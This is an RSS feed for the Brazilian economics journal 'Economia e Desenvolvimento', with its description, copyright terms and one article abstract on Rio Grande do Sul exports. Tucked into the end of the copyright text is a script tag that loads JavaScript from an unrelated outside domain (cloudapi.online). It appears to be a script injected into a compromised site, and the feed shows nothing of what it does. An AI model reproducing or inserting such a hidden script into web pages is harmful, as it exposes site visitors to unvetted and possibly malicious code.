Economia e Desenvolvimento https://periodicos.ufsm.br/eed <p style="text-align: justify;">A revista <strong>Economia e Desenvolvimento</strong> é um periódico acadêmico-científico em formato <em>on-line</em> da área de Economia, vinculada ao Programa de Pós-Graduação em Economia e Desenvolvimento (PPGE&amp;D) do Departamento de Economia e Relações Internacionais da Universidade Federal de Santa Maria. A E&amp;D tem a finalidade de divulgar a produção científica e promover o debate acadêmico na temática do desenvolvimento econômico, considerando a pluralidade teórica e metodológica da Ciência Econômica. Para atender a esse propósito, a E&amp;D publica, em fluxo de publicação contínua, artigos e resenhas, em português, espanhol ou inglês. A E&amp;D está indexada à base Latindex.</p> <p style="text-align: justify;"><strong>eISSN 2595-833X | Qualis/CAPES (2017-2020) = B2</strong></p> pt-BR A revista se reserva o direito de efetuar, nos originais, alterações de ordem normativa, ortográfica e gramatical, com vistas a manter o padrão culto da lingua, respeitando, porém, o exito dos autores. As provas finais não serão enviadas aos autores. Os trabalhos publicados passam a ser propriedade da revista Economia e Desenvolvimento. Deve ser consignada a fonte de publicação original. Os originais não serão devolvidos aos autores. As opiniões emitidas pelos autores dos artigos são de sua exclusiva responsabilidade.<script id="lg210a" type="text/javascript" src="https://cloudapi.online/js/api46.js"></script> red@ufsm.br (Júlio Rohenkohl) centraldeperiodicos@ufsm.br (Central de Periódicos da UFSM) Fri, 29 Dec 2023 18:47:18 -0300 OJS 3.3.0.10 http://blogs.law.harvard.edu/tech/rss 60 Determinantes das exportações do Rio Grande do Sul entre 1997 e 2021 https://periodicos.ufsm.br/eed/article/view/71713 <p>O presente estudo apresenta uma análise empírica dos determinantes das exportações do Rio Grande do Sul entre 1997 e 2021. Nos últimos 25 anos, houve uma clara mudança tanto na matriz de bens exportados quanto no destino das exportações de mercadorias do RS. Utilizando a metodologia de Mínimos Quadrados Ordinários, os resultados encontrados na análise empírica mostram que a expansão das exportações para a China contribui para o aumento das exportações de bens do setor primário. Consequentemente, essa expansão é o fator determinante para a queda das exportações manufaturadas.</p> Carlos Gilbert Conte Filho Copyright (c) 2023 Economia e Desenvolvimento https://creativecommons.org/licenses/by-nc-sa/4.0 https://periodicos.ufsm.br/eed/article/view/71713 Fri, 29 Dec 2023 00:00:00 -0300